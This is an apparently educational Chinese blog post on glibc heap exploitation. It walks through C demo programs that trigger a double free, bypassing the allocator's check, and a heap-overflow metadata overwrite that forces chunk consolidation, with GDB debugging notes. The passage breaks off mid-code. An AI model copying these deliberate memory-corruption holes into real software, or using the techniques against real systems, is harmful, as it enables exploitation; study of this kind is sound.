<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="堆漏洞前言我们要首先熟悉几种常见的堆漏洞类型，分别是Double Free，堆溢出以及UAF漏洞。一般是借助这些漏洞实现对free chunk的内容进行改写，进而实现漏洞利用 Double Free漏洞顾名思义，这种漏洞的原因是由于错误导致2次对同一个chunk连续释放了两次导致。我们可以通过一个动态调试一个例子，看看对于double free到底是如何影响堆的123456789101112131">
<meta property="og:type" content="article">
<meta property="og:title" content="堆利用系列二：堆漏洞">
<meta property="og:url" content="https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Colorlight&#39;s Blog">
<meta property="og:description" content="堆漏洞前言我们要首先熟悉几种常见的堆漏洞类型，分别是Double Free，堆溢出以及UAF漏洞。一般是借助这些漏洞实现对free chunk的内容进行改写，进而实现漏洞利用 Double Free漏洞顾名思义，这种漏洞的原因是由于错误导致2次对同一个chunk连续释放了两次导致。我们可以通过一个动态调试一个例子，看看对于double free到底是如何影响堆的123456789101112131">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-14-49-52.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-14-53-35.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-14-57-21.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-14-57-45.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-15-41-57.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-15-50-32.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-15-51-09.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-16-07-37.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-16-08-01.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-16-12-39.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-16-18-05.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-17-27-26.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-17-28-36.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-17-32-11.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-17-44-15.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-17-58-45.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-17-59-23.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-17-56-06.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-19-14-46-03.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-19-14-53-13.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-24-12-22-24.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-19-15-35-50.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-19-15-41-25.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-19-15-45-18.png">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-05-19-15-47-18.png">
<meta property="article:published_time" content="2021-06-17T12:57:35.000Z">
<meta property="article:modified_time" content="2021-06-17T13:27:17.361Z">
<meta property="article:author" content="Colorlight">
<meta property="article:tag" content="堆利用">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://colorlight.github.io/images/heap_exp/2021-05-18-14-49-52.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>堆利用系列二：堆漏洞</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/atom.xml" title="Colorlight&#39;s Blog" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇 " href="/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8Bunlink/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇 " href="/2021/05/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%E5%BC%80%E7%AF%87/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部 " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章 " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&text=堆利用系列二：堆漏洞"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&title=堆利用系列二：堆漏洞"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&is_video=false&description=堆利用系列二：堆漏洞"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=堆利用系列二：堆漏洞&body=Check out this article: https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&title=堆利用系列二：堆漏洞"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&title=堆利用系列二：堆漏洞"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&title=堆利用系列二：堆漏洞"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&title=堆利用系列二：堆漏洞"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&name=堆利用系列二：堆漏洞&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&t=堆利用系列二：堆漏洞"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A0%86%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.</span> <span class="toc-text">堆漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">2.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Double-Free%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.</span> <span class="toc-text">Double Free漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A0%86%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.</span> <span class="toc-text">堆溢出漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#UAF%E6%BC%8F%E6%B4%9E"><span class="toc-number">5.</span> <span class="toc-text">UAF漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">6.</span> <span class="toc-text">参考</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        堆利用系列二：堆漏洞
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Colorlight</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-06-17T12:57:35.000Z" itemprop="datePublished">2021-06-17</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E5%A0%86%E5%88%A9%E7%94%A8/">堆利用</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E5%A0%86%E5%88%A9%E7%94%A8/" rel="tag">堆利用</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="堆漏洞"><a href="#堆漏洞" class="headerlink" title="堆漏洞"></a>堆漏洞</h2><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>我们要首先熟悉几种常见的堆漏洞类型，分别是Double Free，堆溢出以及UAF漏洞。一般是借助这些漏洞实现对free chunk的内容进行改写，进而实现漏洞利用</p>
<h2 id="Double-Free漏洞"><a href="#Double-Free漏洞" class="headerlink" title="Double Free漏洞"></a>Double Free漏洞</h2><p>顾名思义，这种漏洞的原因是由于错误导致2次对同一个chunk连续释放了两次导致。我们可以通过一个动态调试一个例子，看看对于double free到底是如何影响堆的<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line"></span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">    puts(&quot;The goal of this is to show how we can edit a freed chunk using a Double Free bug.&quot;);</span><br><span class="line">    puts(&quot;Editing freed chunks will allow us to overwrite heap metadata, which is crucial to a lot of heap attacks.&quot;);</span><br><span class="line">    puts(&quot;However a bug to edit the heap metadata is often just one piece of the exploitation process.\n&quot;);</span><br><span class="line"></span><br><span class="line">    printf(&quot;So we start off by allocating three chunks of memory. Let&apos;s also write some data to them.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    char *ptr0, *ptr1, *ptr2;</span><br><span class="line"></span><br><span class="line">    ptr0 = malloc(0x30);</span><br><span class="line">    ptr1 = malloc(0x30);</span><br><span class="line">    ptr2 = malloc(0x30);</span><br><span class="line"></span><br><span class="line">    char *data0 = &quot;00000000&quot;;</span><br><span class="line">    char *data1 = &quot;11111111&quot;;</span><br><span class="line">    char *data2 = &quot;22222222&quot;;</span><br><span class="line"></span><br><span class="line">    memcpy(ptr0, data0, 0x8);</span><br><span class="line">    memcpy(ptr1, data1, 0x8);   </span><br><span class="line">    memcpy(ptr2, data2, 0x8);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Chunk0: @ %p\t contains: %s\n&quot;, ptr0, ptr0);</span><br><span class="line">    printf(&quot;Chunk1: @ %p\t contains: %s\n&quot;, ptr1, ptr1);</span><br><span class="line">    printf(&quot;Chunk2: @ %p\t contains: %s\n\n&quot;, ptr2, ptr2);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Now is where the bug comes in. We will free the same pointer twice (the first chunk pointed to by ptr0).\n&quot;);</span><br><span class="line">    printf(&quot;In between the two frees, we will free a different pointer. This is because in several different versions of malloc, there is a double free check \n(however in libc-2.27 it will hit the tcache and this will be fine).\n&quot;);</span><br><span class="line">    printf(&quot;It will check if the pointer being free is the same as the last chunk freed, and if it is the program will cease execution.\n&quot;);</span><br><span class="line">    printf(&quot;To bypass this, we can just free something in between the two frees to the same pointer.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    free(ptr0); //-----------------------&gt; b1</span><br><span class="line">    free(ptr1);</span><br><span class="line">    free(ptr0); //-----------------------&gt; b2</span><br><span class="line">    </span><br><span class="line">    printf(&quot;Next up we will allocate three new chunks of the same size that we freed, and write some data to them. This will give us the three chunks we freed.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    char *ptr3, *ptr4, *ptr5;</span><br><span class="line"></span><br><span class="line">    ptr3 = malloc(0x30); //--------------&gt; b3</span><br><span class="line">    ptr4 = malloc(0x30);</span><br><span class="line">    ptr5 = malloc(0x30);</span><br><span class="line"></span><br><span class="line">    memcpy(ptr3, data0, 0x8);</span><br><span class="line">    memcpy(ptr4, data1, 0x8);   </span><br><span class="line">    memcpy(ptr5, data2, 0x8);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Chunk3: @ %p\t contains: %s\n&quot;, ptr3, ptr3);  //-------------&gt; b4</span><br><span class="line">    printf(&quot;Chunk4: @ %p\t contains: %s\n&quot;, ptr4, ptr4);</span><br><span class="line">    printf(&quot;Chunk5: @ %p\t contains: %s\n\n&quot;, ptr5, ptr5);</span><br><span class="line"></span><br><span class="line">    printf(&quot;So you can see that we allocated the same pointer twice, as a result of freeing the same pointer twice (since malloc will reuse freed chunks of similar sizes for performance boosts).\n&quot;);</span><br><span class="line">    printf(&quot;Now we can free one of the pointers to either Chunk 3 or 5 (ptr3 or ptr5), and clear out the pointer. We will still have a pointer remaining to the same memory chunk, which will now be freed.\n&quot;);</span><br><span class="line">    printf(&quot;As a result we can use the double free to edit a freed chunk. Let&apos;s see it in action by freeing Chunk3 and setting the pointer equal to 0x0 (which is what&apos;s supposed to happen to prevent UAFs).\n\n&quot;);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    free(ptr3);</span><br><span class="line">    ptr3 = 0x0;</span><br><span class="line"></span><br><span class="line">    printf(&quot;Chunk3: @ %p\n&quot;, ptr3);</span><br><span class="line">    printf(&quot;Chunk5: @ %p\n\n&quot;, ptr5);</span><br><span class="line"></span><br><span class="line">    printf(&quot;So you can see that we have freed ptr3 (Chunk 3) and discarded it&apos;s pointer. However we still have a pointer to it. Using that we can edit the freed chunk.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    char *data3 = &quot;15935728&quot;;</span><br><span class="line">    memcpy(ptr5, data3, 0x8);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Chunk5: @ %p\t contains: %s\n\n&quot;, ptr5, ptr5);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Just like that, we were able to use a double free to edit a free chunk!\n&quot;);</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>我们编译好这个源代码，然后使用GEF GDB进行调试，笔者倾向于配合IDA看反编译代码。我们在b1处打断点，在GDB中观察heap的情况:<br><img src="/images/heap_exp/2021-05-18-14-49-52.png" alt><br>可以看到我们已经分配了3个chunk去存储了3个字符串。<br><img src="/images/heap_exp/2021-05-18-14-53-35.png" alt><br>而此时各种bin和tcache上面还是什么都没有，因为我们并没有释放任何chunk。<br>为了避免double free的检测，需要在连续free之间添加一个free(ptr1)，这样就可以绕过double free的检测,我们在b2进行断点在观察heap的情况<br><img src="/images/heap_exp/2021-05-18-14-57-21.png" alt><br><img src="/images/heap_exp/2021-05-18-14-57-45.png" alt><br>我们可以发现tcache的0x40大小的链表已经存储了两个free chunk。<br>再通过在b3处下断点，观察double free给heap造成的影响：后来发现直接被检测出了double free<br><img src="/images/heap_exp/2021-05-18-15-41-57.png" alt><br>发现应该是glibc的版本太高了，已经无法这么简单地绕过double free了，根据源代码中的提示，glibc版本为2.27，参考<a href="https://blog.csdn.net/weixin_44864859/article/details/107237134" target="_blank" rel="noopener">关于Linux下更换不同glibc版本的解决方法</a>，使用glibc-all-in-one和patchelf对编译好的二进制文件直接替换其ld和libc的链接库地址，指向2.27版本的再次进行调试.</p>
<p>在b2处的堆内存情况为<br><img src="/images/heap_exp/2021-05-18-15-50-32.png" alt><br>在b3处的堆内存情况为<br><img src="/images/heap_exp/2021-05-18-15-51-09.png" alt><br>经过两次释放我们我可以看到addr=0x555555758670这个chunk被放到了tcache 0x40 大小的链表上两次</p>
<p>在b4处下断点，观察新的3个malloc返回地址是什么，以及现在的heap状态<br><img src="/images/heap_exp/2021-05-18-16-07-37.png" alt><br><img src="/images/heap_exp/2021-05-18-16-08-01.png" alt><br>这个地方实际上GEF貌似是有点问题的，tcache里面实际上已经没有chunk了，count为0，但是还是显示有一个，这应该是是一个bug。 </p>
<p>标准输出的结果<br><img src="/images/heap_exp/2021-05-18-16-12-39.png" alt><br>我们可以看出来，ptr3和ptr5实际上是返回的同一块地址。</p>
<p>因此当后面我们继续释放ptr3，并且把ptr3的值指向0x0,我们还是可以操作这个已经被释放的块的<br>根据标准输出的结果<br><img src="/images/heap_exp/2021-05-18-16-18-05.png" alt></p>
<p>我们先不用管能够修改已经被释放的空闲块中的内容到底有什么用，我们只考虑现在我们的Double free是可以实现这个目标的，当我把剩下的heapoveflow和UAF介绍完了再去解释修改空闲块到底有什么意义。</p>
<p>所以double free到能修改free chunk最简单抽象是首先两次free同一块地址，然后再连续两次malloc相同大小，然后再free其中一个，那么剩下那个指针指向的就是空闲块的chunk，而且还是可以被修改的。总结就是2次free，2次malloc，一次free，最终得到可用的空闲块指针。</p>
<h2 id="堆溢出漏洞"><a href="#堆溢出漏洞" class="headerlink" title="堆溢出漏洞"></a>堆溢出漏洞</h2><p>下面我们将通过一个堆溢出实例，观察堆溢出是如何触发了空闲块的融合，并且得到空闲块的控制权的。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line"></span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">    puts(&quot;The goal of this is to show how we can edit a freed chunk using a heap overflow bug to cause consolidation.&quot;);</span><br><span class="line">    puts(&quot;Editing freed chunks will allow us to overwrite heap metadata, which is crucial to a lot of attacks.&quot;);</span><br><span class="line">    puts(&quot;However a bug to edit the heap metadata is often just one piece of the exploitation process.\n&quot;);</span><br><span class="line"></span><br><span class="line">    printf(&quot;We will start off by allocating four separate chunks of memory. The first three will be used for the heap consolidation.\n&quot;);</span><br><span class="line">    printf(&quot;The last one will be used to essentially separate this from the heap wilderness, and we won&apos;t do anything with it.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    unsigned long *ptr0, *ptr1, *ptr2, *ptr3, *ptr4, *ptr5;</span><br><span class="line"></span><br><span class="line">    ptr0 = malloc(0x500);</span><br><span class="line">    ptr1 = malloc(0x70);</span><br><span class="line">    ptr2 = malloc(0x500);</span><br><span class="line">    ptr3 = malloc(0x30);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Chunk 0: %p\t Size: 0x500\n&quot;, ptr0);</span><br><span class="line">    printf(&quot;Chunk 1: %p\t Size: 0x70\n&quot;, ptr1);</span><br><span class="line">    printf(&quot;Chunk 2: %p\t Size: 0x500\n&quot;, ptr2);</span><br><span class="line">    printf(&quot;Chunk 3: %p\t Size: 0x30\n\n&quot;, ptr3);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Now the reason why the first and second chunks are 0x500 in sizes, is because they will be the ones we are freeing. In the most recent libc versions (2.26 &amp; 2.27), there is a tcache mechanism.\n&quot;);</span><br><span class="line">    printf(&quot;If these chunks were much smaller, they would be stored in the tcaching mechanism and this wouldn&apos;t work. So I made them large so they wouldn&apos;t end up in the tcache.\n\n&quot;);</span><br><span class="line">    </span><br><span class="line">    printf(&quot;Start off by freeing ptr0, and clearing the pointer (which is often done when heap chunks get freed to avoid a use after free).\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    free(ptr0);  //----------&gt;b1</span><br><span class="line">    ptr0 = 0;    //----------&gt;b2</span><br><span class="line"></span><br><span class="line">    printf(&quot;Chunk 0: %p\n\n&quot;, ptr0);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Now is where the heap overflow bug comes into play. We will overflow the heap metadata of ptr2. We can see that the size of ptr2 is 0x511.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Size of Chunk 2 @ %p\t Metadata Size: 0x%lx\n\n&quot;, ptr2, ptr2[-1]);</span><br><span class="line"></span><br><span class="line">    printf(&quot;0x500 bytes for the data, 0x10 bytes for the metadata, and 0x1 byte to designate that the previous chunk is in use. Our overflow will overwrite this, and the previous size value.\n&quot;);</span><br><span class="line">    printf(&quot;We will overwrite the size to be 0x510, essentially clearing the previous in use bit. This way when we free this chunk, it will think that the previous chunk has been freed (which it hasn&apos;t).\n&quot;);</span><br><span class="line">    printf(&quot;So following that, we will place a fake previous size which is the previous QWORD behind the size. We will put it as 0x590, so it thinks that the previous chunk goes all the way back to where Chunk 0 is.\n&quot;);</span><br><span class="line">    printf(&quot;Then when we free Chunk 2, it will consolidate the heap past chunk 1 and up to chunk 0. Then we can start allocating memory from where Chunk 0, and get an overlapping pointer to where Chunk 1 is, since it thinks it has been freed.\n&quot;);</span><br><span class="line">    printf(&quot;Let&apos;s do the overwrite.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    ptr1[14] = 0x590;</span><br><span class="line">    ptr1[15] = 0x510;</span><br><span class="line"></span><br><span class="line">    printf(&quot;Chunk 2 @ %p\nPrevious Size: 0x%lx\nSize: 0x%lx\n\n&quot;, ptr2, ptr2[-2], ptr2[-1]);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Now we free chunk 2 to cause consolidation.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    free(ptr2); //------------------&gt;b3</span><br><span class="line">    ptr2 = 0;   //------------------&gt;b4</span><br><span class="line"></span><br><span class="line">    printf(&quot;Now we can allocate a 0x500 chunk and an 0x70 chunk, and we wil get a pointer to where chunk 1 was.\n\n&quot;);</span><br><span class="line">    ptr4 = malloc(0x500);</span><br><span class="line">    ptr5 = malloc(0x70);    </span><br><span class="line"></span><br><span class="line">    printf(&quot;Chunk 4: %p\t Size: 0x500\n&quot;, ptr4);</span><br><span class="line">    printf(&quot;Chunk 5: %p\t Size: 0x30\n\n&quot;, ptr5);</span><br><span class="line"></span><br><span class="line">    printf(&quot;With that we can just free Chunk 1 (which is the same as Chunk 5), and we will be able to edit a freed heap chunk.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">    free(ptr1);  //-------------------&gt;b5</span><br><span class="line">    ptr1 = 0;   //-------------------&gt;b6</span><br><span class="line"></span><br><span class="line">    char 